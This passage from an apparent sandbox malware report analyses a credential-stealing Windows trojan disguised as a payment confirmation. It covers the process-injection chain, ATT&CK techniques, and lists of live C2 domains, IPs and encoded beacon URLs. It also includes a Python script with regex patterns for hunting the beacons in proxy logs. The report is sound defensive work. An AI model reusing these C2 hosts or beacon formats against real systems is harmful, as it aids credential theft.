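        "credential_access": credential_access(lines),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_LINES), indent=2))
```

To run it over a full report, feed it the lines of the HIPS and Stealing sections instead of SAMPLE_LINES. The chain walk keeps only the last executable mapping per source process and stops at the first cycle, which is enough for the linear chain this report shows; a sample that maps into several targets would need a graph rather than a dict.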

            Remote Access Functionality

Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_013391DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_013396E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E293F4 sqlite3_mutex_leave,sqlite3_bind_blob
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E163D4 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E03203 sqlite3_bind_parameter_count
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E03215 sqlite3_bind_parameter_name
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E165F0 sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E295F7 sqlite3_bind_null,sqlite3_mutex_leave
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E295D1 sqlite3_bind_int,sqlite3_bind_int64
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E29582 sqlite3_bind_int64,sqlite3_mutex_leave
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E2951D sqlite3_bind_double,sqlite3_mutex_leave
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E294F6 sqlite3_bind_text16
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E29489 sqlite3_bind_text64
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E29462 sqlite3_bind_text
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E6C43E sqlite3_mprintf,sqlite3_bind_int
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E2941B sqlite3_bind_blob64
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E297F9 sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E29712 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E6C6C1 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v3,sqlite3_free,sqlite3_bind_value
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E296A5 sqlite3_bind_zeroblob,sqlite3_mutex_leave
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E29628 sqlite3_bind_pointer,sqlite3_mutex_leave
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4_2_61E12CD9 sqlite3_bind_parameter_index
MITRE ATT&CK matrix, one line per tactic. Bracketed numbers are the badge counts shown next to matched techniques in the report's matrix; entries without a bracket are the unmatched cells of the matrix template.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts [2]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API [3]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading [1]; Valid Accounts [2]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Exploitation for Privilege Escalation [1]; Abuse Elevation Control Mechanism [1]; DLL Side-Loading [1]; Valid Accounts [2]; Access Token Manipulation [21]; Process Injection [212]; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Abuse Elevation Control Mechanism [1]; Obfuscated Files or Information [3]; DLL Side-Loading [1]; Valid Accounts [2]; Virtualization/Sandbox Evasion [2]; Access Token Manipulation [21]; Process Injection [212]; Dynamic API Resolution
Credential Access: OS Credential Dumping [1]; Input Capture [21]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery [2]; Account Discovery [1]; File and Directory Discovery [2]; System Information Discovery [128]; Security Software Discovery [15]; Virtualization/Sandbox Evasion [2]; Process Discovery [3]; Application Window Discovery [11]; System Owner/User Discovery [1]; Remote System Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data [1]; Browser Session Hijacking [1]; Data from Local System [1]; Email Collection [1]; Input Capture [21]; Clipboard Data [3]; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer [5]; Encrypted Channel [1]; Non-Application Layer Protocol [4]; Application Layer Protocol [4]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID 1509210, sample: Payment confirmation 20240911.exe, start date 11/09/2024, architecture WINDOWS, score 100)

Top-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures. Top-level DNS: www.kxshopmr.store.

Process chain:

Payment confirmation 20240911.exe (started)
    signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
    -> svchost.exe (started)
        signatures: Maps a DLL or memory area into another process
        -> xONxwdydvq.exe (injected)
            DNS/IP: www.kckartal.xyz; www.golbasi-nakliyat.xyz (Performs DNS queries to domains with low reputation); 18 other IPs or domains
            signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
            -> RMActivate_ssp.exe (started)
                DNS/IP: www.sqlite.org, 45.33.6.223:80 (local port 49162), LINODE-APLinodeLLCUS, United States
                dropped: C:\Users\user\AppData\Local\...\sqlite3.dll (PE32)
                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Maps a DLL or memory area into another process
                -> firefox.exe (started)

Antivirus detection (Source | Detection | Scanner | Label)

Sample:
Payment confirmation 20240911.exe | 32% | ReversingLabs
Payment confirmation 20240911.exe | 33% | Virustotal
Payment confirmation 20240911.exe | 100% | Joe Sandbox ML

Dropped files:
C:\Users\user\AppData\Local\Temp\sqlite3.dll | 0% | ReversingLabs

No Antivirus matches

Domains:
hm62t.top | 2% | Virustotal
bola88site.one | 0% | Virustotal
freepicture.online | 1% | Virustotal
www.qiluqiyuan.buzz | 1% | Virustotal
natroredirect.natrocdn.com | 0% | Virustotal
www.726075.buzz | 1% | Virustotal
www.freepicture.online | 1% | Virustotal
www.bola88site.one | 0% | Virustotal
www.318st.com | 0% | Virustotal
www.monos.shop | 0% | Virustotal
www.hm62t.top | 2% | Virustotal
www.kxshopmr.store | 0% | Virustotal
www.mfgamecompany.shop | 0% | Virustotal
www.sqlite.org | 0% | Virustotal

URLs:
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://www.golbasi-nakliyat.xyz/k2vl/ | 0% | Avira URL Cloud | safe
http://www.mizuquan.top | 0% | Avira URL Cloud | safe
http://www.bola88site.one/3lkx/ | 0% | Avira URL Cloud | safe
http://www.sqlite.org/2018/sqlite-dll-win32-x86-3220000.zip | 0% | Avira URL Cloud | safe
http://www.mfgamecompany.shop/lwt6/ | 0% | Avira URL Cloud | safe
http://www.kckartal.xyz/h5qr/ | 0% | Avira URL Cloud | safe
http://www.mfgamecompany.shop/lwt6/?OlTXe=j/d5AuZ+qvKLIrA4zUrVw+2CrkvGu2Abkvu2bg8Q1qFMmFYyV0FqVOqh+5a/W0db1sjnIOHkeiKnBLtde7l1JWY97ka7LeQptngAefCJEWxKZG7LUP9THac9rEGk&th=XXRlJ2 | 0% | Avira URL Cloud | safe
http://www.mizuquan.top/ed2j/?OlTXe=HnYP2yoU4dt40olvIGC5RoskYevTXTgkbcmGMLslyKV8dFp2SGuaPRuUt3ufihjdd5fzvgaawU7CuzqToCbPCdeTlZwsuBv/uVCwYl9sd7doy+RVtoqpun8fEj8V&th=XXRlJ2 | 0% | Avira URL Cloud | safe
http://www.hm62t.top/p39s/?th=XXRlJ2&OlTXe=1N9NMDNpm9Czos0vDrs0jP0yJ99w59mrSL4zw6nNIeZI+vV5F9OeHegmPR72METQIT3pI5KWWCEpjpCMjPRQtKE/9BfJGlSqJeHxtl2Ce1Gg34KYTx0FEqSEiFH5 | 0% | Avira URL Cloud | safe
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | 0% | Avira URL Cloud | safe
http://www.quilo.life/ftr3/ | 0% | Avira URL Cloud | safe
http://www.bola88site.one/3lkx/?OlTXe=RihUS+ZcBcWtP49cUvm0lvpx13KYYtk0xYk2jkkE+x6ehgmefEg3A03kFcwA9a4nHW6JAbXkRdpGmWZgq18CGWb25/mMW/yooXsz9tlrWzKj4hGr16wEjBRj2jd5&th=XXRlJ2 | 0% | Avira URL Cloud | safe
https://www.mfgamecompany.shop/lwt6/?OlTXe=j/d5AuZ | 0% | Avira URL Cloud | safe
https://www.google.com/favicon.ico | 0% | Avira URL Cloud | safe
http://www.hm62t.top/p39s/ | 0% | Avira URL Cloud | safe
http://www.mizuquan.top/ed2j/ | 0% | Avira URL Cloud | safe
http://www.freepicture.online/xcfw/?th=XXRlJ2&OlTXe=bjW1F6zberoR1D3Y/SomYFBb4KPgrI5pHttayncOl0oweWLXznwXhPhkwae0bsL9Ak/eXSPCLR9UrmkbImBsoCTsC8RlRsuK5QCdMTge/fZa3QU+WBAP1g1G0kur | 0% | Avira URL Cloud | safe
http://www.freepicture.online/xcfw/ | 0% | Avira URL Cloud | safe
http://www.quilo.life/ftr3/?OlTXe=7ghTfXuNFdv7bt0cffwS+GQv8BggimAttJoldp68xQSgk3fAwjETfWJmY0r3VEazrWArn7FbDu6sdwx26ciS++knKqqM0OcB3qa3ON8TTY6A6Cdgot3Jd9OI6yIP&th=XXRlJ2 | 0% | Avira URL Cloud | safe
http://www.qiluqiyuan.buzz/wjff/ | 0% | Avira URL Cloud | safe
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Avira URL Cloud | safe
http://www.kckartal.xyz/h5qr/?th=XXRlJ2&OlTXe=/bmdZ0vLXnogocV0idkPv6fvlXir++PhB87loKV3gq9LyeQpMfhy5LnTQyXzEM68COgVHo1sr0sPxg1PcZaDoopDxaOUW7iZ7CHsWJT1TI0rPygwHovQ2DwKWcHt | 0% | Avira URL Cloud | safe
http://www.qiluqiyuan.buzz/wjff/?th=XXRlJ2&OlTXe=4KVKOjLTUXvpTd2tw+0OX+rMvdItGaiAiZnao6g9chZjOHWeMu7zgCrtm+9lJj39MntFpwW3ylu2DkTtyMRuAfMcELFFIudA3Xek0R/SN0pIlMTDq5r7ULEj7ewp | 0% | Avira URL Cloud | safe
http://www.sqlite.org/copyright.html. | 0% | Avira URL Cloud | safe
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)

hm62t.top | 154.23.184.240 | active: true | malicious: true | reputation: unknown
www.kckartal.xyz | 104.21.20.125 | active: true | malicious: true | reputation: unknown
www.quilo.life | 203.161.43.228 | active: true | malicious: true | reputation: unknown
bola88site.one | 172.96.191.39 | active: true | malicious: true | reputation: unknown
www.mizuquan.top | 43.242.202.169 | active: true | malicious: true | reputation: unknown
freepicture.online | 89.58.49.1 | active: true | malicious: true | reputation: unknown
mfgamecompany.shop | 185.173.111.76 | active: true | malicious: true | reputation: unknown
www.726075.buzz | 47.57.185.227 | active: true | malicious: true | reputation: unknown
www.qiluqiyuan.buzz | 161.97.168.245 | active: true | malicious: true | reputation: unknown
www.sqlite.org | 45.33.6.223 | active: true | malicious: false | reputation: unknown
natroredirect.natrocdn.com | 85.159.66.93 | active: true | malicious: true | reputation: unknown
www.golbasi-nakliyat.xyz | IP unknown | active: unknown | malicious: true | reputation: unknown
www.freepicture.online | IP unknown | active: unknown | malicious: true | reputation: unknown
www.monos.shop | IP unknown | active: unknown | malicious: true | reputation: unknown
www.hm62t.top | IP unknown | active: unknown | malicious: true | reputation: unknown
www.mfgamecompany.shop | IP unknown | active: unknown | malicious: true | reputation: unknown
www.bola88site.one | IP unknown | active: unknown | malicious: true | reputation: unknown
www.318st.com | IP unknown | active: unknown | malicious: true | reputation: unknown
www.kxshopmr.store | IP unknown | active: unknown | malicious: true | reputation: unknown
URLs (Name | Malicious | Antivirus Detection | Reputation)

http://www.bola88site.one/3lkx/ | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.sqlite.org/2018/sqlite-dll-win32-x86-3220000.zip | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.mfgamecompany.shop/lwt6/ | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.golbasi-nakliyat.xyz/k2vl/ | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.mfgamecompany.shop/lwt6/?OlTXe=j/d5AuZ+qvKLIrA4zUrVw+2CrkvGu2Abkvu2bg8Q1qFMmFYyV0FqVOqh+5a/W0db1sjnIOHkeiKnBLtde7l1JWY97ka7LeQptngAefCJEWxKZG7LUP9THac9rEGk&th=XXRlJ2 | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.kckartal.xyz/h5qr/ | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.mizuquan.top/ed2j/?OlTXe=HnYP2yoU4dt40olvIGC5RoskYevTXTgkbcmGMLslyKV8dFp2SGuaPRuUt3ufihjdd5fzvgaawU7CuzqToCbPCdeTlZwsuBv/uVCwYl9sd7doy+RVtoqpun8fEj8V&th=XXRlJ2 | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.hm62t.top/p39s/?th=XXRlJ2&OlTXe=1N9NMDNpm9Czos0vDrs0jP0yJ99w59mrSL4zw6nNIeZI+vV5F9OeHegmPR72METQIT3pI5KWWCEpjpCMjPRQtKE/9BfJGlSqJeHxtl2Ce1Gg34KYTx0FEqSEiFH5 | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.quilo.life/ftr3/ | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.bola88site.one/3lkx/?OlTXe=RihUS+ZcBcWtP49cUvm0lvpx13KYYtk0xYk2jkkE+x6ehgmefEg3A03kFcwA9a4nHW6JAbXkRdpGmWZgq18CGWb25/mMW/yooXsz9tlrWzKj4hGr16wEjBRj2jd5&th=XXRlJ2 | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.hm62t.top/p39s/ | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.mizuquan.top/ed2j/ | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.freepicture.online/xcfw/?th=XXRlJ2&OlTXe=bjW1F6zberoR1D3Y/SomYFBb4KPgrI5pHttayncOl0oweWLXznwXhPhkwae0bsL9Ak/eXSPCLR9UrmkbImBsoCTsC8RlRsuK5QCdMTge/fZa3QU+WBAP1g1G0kur | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.freepicture.online/xcfw/ | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.quilo.life/ftr3/?OlTXe=7ghTfXuNFdv7bt0cffwS+GQv8BggimAttJoldp68xQSgk3fAwjETfWJmY0r3VEazrWArn7FbDu6sdwx26ciS++knKqqM0OcB3qa3ON8TTY6A6Cdgot3Jd9OI6yIP&th=XXRlJ2 | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.qiluqiyuan.buzz/wjff/ | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.kckartal.xyz/h5qr/?th=XXRlJ2&OlTXe=/bmdZ0vLXnogocV0idkPv6fvlXir++PhB87loKV3gq9LyeQpMfhy5LnTQyXzEM68COgVHo1sr0sPxg1PcZaDoopDxaOUW7iZ7CHsWJT1TI0rPygwHovQ2DwKWcHt | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.qiluqiyuan.buzz/wjff/?th=XXRlJ2&OlTXe=4KVKOjLTUXvpTd2tw+0OX+rMvdItGaiAiZnao6g9chZjOHWeMu7zgCrtm+9lJj39MntFpwW3ylu2DkTtyMRuAfMcELFFIudA3Xek0R/SN0pIlMTDq5r7ULEj7ewp | malicious: true | Avira URL Cloud: safe | reputation: unknown
URLs found in memory or dropped files (Name | Source | Malicious | Antivirus Detection | Reputation)

https://duckduckgo.com/chrome_newtab | source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.dr | malicious: false | URL Reputation: safe | reputation: unknown
https://duckduckgo.com/ac/?q= | source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.dr | malicious: false | URL Reputation: safe | reputation: unknown
http://www.mizuquan.top | source: xONxwdydvq.exe, 00000003.00000002.745450083.000000000044C000.00000040.80000000.00040000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.dr | malicious: false | URL Reputation: safe | reputation: unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.dr | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://www.mfgamecompany.shop/lwt6/?OlTXe=j/d5AuZ | source: xONxwdydvq.exe, 00000003.00000002.746297118.00000000055B0000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745738795.0000000003570000.00000004.10000000.00040000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://www.google.com/favicon.ico | source: 7466H3538.4.dr | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://ac.ecosia.org/autocomplete?q= | source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.dr | malicious: false | URL Reputation: safe | reputation: unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | source: xONxwdydvq.exe, 00000003.00000002.746297118.0000000005742000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745738795.0000000003702000.00000004.10000000.00040000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.dr | malicious: false | URL Reputation: safe | reputation: unknown
http://www.sqlite.org/copyright.html. | source: RMActivate_ssp.exe, 00000004.00000002.746268139.0000000061EA5000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.dr | malicious: false | Avira URL Cloud: safe | reputation: unknown
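The C2 URLs in the tables above share one shape (a four-character directory under a www. host, optionally carrying one long base64-like query value and one six-character token such as XXRlJ2), and the stager's fetch of sqlite3.dll from www.sqlite.org follows a second fixed shape (/YYYY/sqlite-dll-win32-x86-NNNNNNN.zip). The following Python is an added hunting example for this page, not Joe Sandbox code and not code from the sample; the two patterns are derived from the URLs the report lists, while the proxy-log format, the length thresholds and the sample log lines (process attribution, timestamps, client IP, status codes) are constructed for the example.

```python
"""Hunt for the two URL shapes documented in this report in proxy logs.

Added example for this page; it is neither Joe Sandbox code nor FormBook code.
Pattern 1 (C2 beacon), taken from the report's URL list:
    http://www.<domain>/<four alphanumerics>/
    optionally with a two-parameter query: one long base64-like value plus
    one six-character token (e.g. ...&th=XXRlJ2).
Pattern 2 (stager), also from the report:
    http://www.sqlite.org/<year>/sqlite-dll-win32-x86-<7 digits>.zip
The log format, the length thresholds and the sample lines are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

C2_PATH = re.compile(r"^/[a-z0-9]{4}/$")               # /k2vl/, /h5qr/, ...
LONG_B64 = re.compile(r"^[A-Za-z0-9+/]{40,}$")          # length floor is an assumption
SHORT_TOKEN = re.compile(r"^[A-Za-z0-9]{6}$")           # XXRlJ2 in this report
SQLITE_DLL = re.compile(r"^/\d{4}/sqlite-dll-win32-x86-\d{7}\.zip$")


def split_query(query):
    """Split a query string without form decoding: parse_qs would turn the
    '+' characters inside the base64-like value into spaces."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def classify_url(url):
    """Return 'sqlite_dll_fetch', 'c2_beacon', 'c2_path_candidate' or 'other'."""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    if host == "www.sqlite.org" and SQLITE_DLL.match(u.path):
        return "sqlite_dll_fetch"
    if host.startswith("www.") and C2_PATH.match(u.path):
        values = [v for _, v in split_query(u.query)]
        if (len(values) == 2 and any(LONG_B64.match(v) for v in values)
                and any(SHORT_TOKEN.match(v) for v in values)):
            return "c2_beacon"
        # A bare four-character directory is too common to alert on by itself.
        return "c2_path_candidate"
    return "other"


def parse_line(line):
    """Assumed log format: <timestamp> <client_ip> <process> <method> <url> <status>."""
    ts, client, process, method, url, status = line.split()
    return {"ts": ts, "client": client, "process": process,
            "method": method, "url": url, "status": int(status)}


def scan(lines):
    """Group hits per process. A process is reported when it produced at least
    one full beacon or fetched the SQLite DLL; path candidates only widen the
    host count, mirroring the fan-out to many domains in the behavior graph."""
    hosts = defaultdict(lambda: defaultdict(set))
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        label = classify_url(rec["url"])
        hosts[rec["process"]][label].add(urlsplit(rec["url"]).hostname)
    findings = {}
    for process, by_label in hosts.items():
        reasons = []
        if by_label["c2_beacon"]:
            fanout = by_label["c2_beacon"] | by_label["c2_path_candidate"]
            reasons.append(f"c2_beacon to {len(fanout)} host(s)")
        if by_label["sqlite_dll_fetch"]:
            reasons.append("sqlite_dll_fetch")
        if reasons:
            findings[process] = reasons
    return findings


# Constructed proxy log. Hosts and paths come from this report; the
# timestamps, client IP, process attribution and status codes are made up.
SAMPLE_LOG = """\
2024-09-11T08:10:01Z 192.168.2.15 RMActivate_ssp.exe GET http://www.sqlite.org/2018/sqlite-dll-win32-x86-3220000.zip 200
2024-09-11T08:10:05Z 192.168.2.15 xONxwdydvq.exe GET http://www.kckartal.xyz/h5qr/ 404
2024-09-11T08:10:07Z 192.168.2.15 xONxwdydvq.exe GET http://www.hm62t.top/p39s/?th=XXRlJ2&OlTXe=1N9NMDNpm9Czos0vDrs0jP0yJ99w59mrSL4zw6nNIeZI+vV5F9OeHegmPR72METQIT3pI5KWWCEpjpCMjPRQtKE/9BfJGlSqJeHxtl2Ce1Gg34KYTx0FEqSEiFH5 200
2024-09-11T08:10:09Z 192.168.2.15 firefox.exe GET https://duckduckgo.com/ac/?q=weather 200
2024-09-11T08:10:11Z 192.168.2.15 firefox.exe GET http://www.example.com/docs/ 200
2024-09-11T08:11:30Z 192.168.2.15 xONxwdydvq.exe GET http://www.mfgamecompany.shop/lwt6/?OlTXe=j/d5AuZ+qvKLIrA4zUrVw+2CrkvGu2Abkvu2bg8Q1qFMmFYyV0FqVOqh+5a/W0db1sjnIOHkeiKnBLtde7l1JWY97ka7LeQptngAefCJEWxKZG7LUP9THac9rEGk&th=XXRlJ2 200
"""

if __name__ == "__main__":
    for process, reasons in scan(SAMPLE_LOG.splitlines()).items():
        print(process, "->", ", ".join(reasons))
```

Run against the constructed log, `scan` reports xONxwdydvq.exe for beaconing to three distinct hosts and RMActivate_ssp.exe for the sqlite.org fetch, while firefox.exe, whose only hit is a bare four-character directory on www.example.com, is not reported. The deliberate split between `c2_beacon` and `c2_path_candidate` keeps the low-fidelity path pattern from alerting on its own; the candidate set is only used to count fan-out once a process has produced a full beacon.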
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)

45.33.6.223 | www.sqlite.org | United States | ASN 63949 | LINODE-APLinodeLLCUS | malicious: false
47.57.185.227 | www.726075.buzz | United States | ASN 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | malicious: true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | ASN 34619 | CIZGITR | malicious: true
203.161.43.228 | www.quilo.life | Malaysia | ASN 45899 | VNPT-AS-VNVNPTCorpVN | malicious: true
172.96.191.39 | bola88site.one | Canada | ASN 59253 | LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | malicious: true
104.21.20.125 | www.kckartal.xyz | United States | ASN 13335 | CLOUDFLARENETUS | malicious: true
89.58.49.1 | freepicture.online | Germany | ASN 5430 | FREENETDEfreenetDatenkommunikationsGmbHDE | malicious: true
154.23.184.240 | hm62t.top | United States | ASN 174 | COGENT-174US | malicious: true
185.173.111.76 | mfgamecompany.shop | Germany | ASN 42366 | TERRATRANSIT-ASDE | malicious: true
43.242.202.169 | www.mizuquan.top | Hong Kong | ASN 40065 | CNSERVERSUS | malicious: true
161.97.168.245 | www.qiluqiyuan.buzz | United States | ASN 51167 | CONTABODE | malicious: true
IP: 192.168.2.255
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1509210
Start date and time: 2024-09-11 10:07:40 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Payment confirmation 20240911.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/7@20/12
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 85%
